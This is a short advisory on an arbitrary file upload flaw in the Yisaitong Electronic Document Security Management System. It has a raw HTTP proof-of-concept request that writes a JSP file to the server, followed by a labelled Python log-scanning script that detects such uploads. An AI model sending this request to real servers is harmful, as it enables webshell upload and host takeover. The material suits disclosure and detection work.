Yisaitong Electronic Document Security Management System UploadFileFromClientServiceForClient Arbitrary File Upload Vulnerability
Vulnerability Description
The UploadFileFromClientServiceForClient interface of the Yisaitong Electronic Document Security Management System has an arbitrary file upload vulnerability. An attacker can use it to upload any file to the server and obtain host permissions.
Vulnerability Impact
Yisaitong Electronic Document Security Management System
Network surveying and mapping
Vulnerability Reproduction
Login page
Verification PoC
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Content-Length: 1
Test
/tttT.jsp
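For detection, the following added example (not part of the original write-up) scans web access logs for POST requests to the endpoint used in the PoC and for later successful JSP requests from the same client to paths that were not seen before the upload. The Common/Combined Log Format, the sample log lines, the placeholder query string and the function and variable names are assumptions.

```python
import re

# Endpoint taken from the PoC request on this page.
UPLOAD_PATH = "/CDGServer3/UploadFileFromClientServiceForClient"
# Assumption: the server writes Common/Combined Log Format access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})\b'
)
JSP_RE = re.compile(r"\.jspx?$", re.IGNORECASE)

# Constructed sample log (documentation IP ranges, placeholder query string).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /CDGServer3/index.jsp HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:05:00 +0000] "POST /CDGServer3/UploadFileFromClientServiceForClient?PLACEHOLDER HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:05:03 +0000] "GET /tttT.jsp HTTP/1.1" 200 4',
    '192.0.2.10 - - [01/Jan/2024:10:06:00 +0000] "GET /CDGServer3/index.jsp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:07:00 +0000] "GET /missing.jsp HTTP/1.1" 404 0',
]


def find_suspicious(lines):
    """Return alerts as (kind, client_ip, path) tuples, in log order."""
    alerts = []
    baseline_jsp = set()  # JSP paths requested before any upload POST was seen
    uploaders = set()     # clients that POSTed to the upload endpoint
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue      # not an access-log entry
        ip, method, status = m["ip"], m["method"], m["status"]
        # Drop the query string and any ";param" path suffix before matching.
        path = m["uri"].split("?", 1)[0].split(";", 1)[0]
        if method == "POST" and path == UPLOAD_PATH:
            uploaders.add(ip)
            alerts.append(("upload_post", ip, path))
        elif JSP_RE.search(path):
            if not uploaders:
                baseline_jsp.add(path)  # seen before any upload: treat as known
            elif ip in uploaders and path not in baseline_jsp and status == "200":
                alerts.append(("new_jsp_after_upload", ip, path))
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_LOG):
        print(alert)
```

The baseline is a heuristic: a legitimate JSP that was never requested before the first upload POST will also be flagged, so review each hit against the files actually present in the web root.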
Reference link
https://github.com/di0xide-U/YSTupload/blob/main/exp.md
This post is licensed under CC BY 4.0 by the author.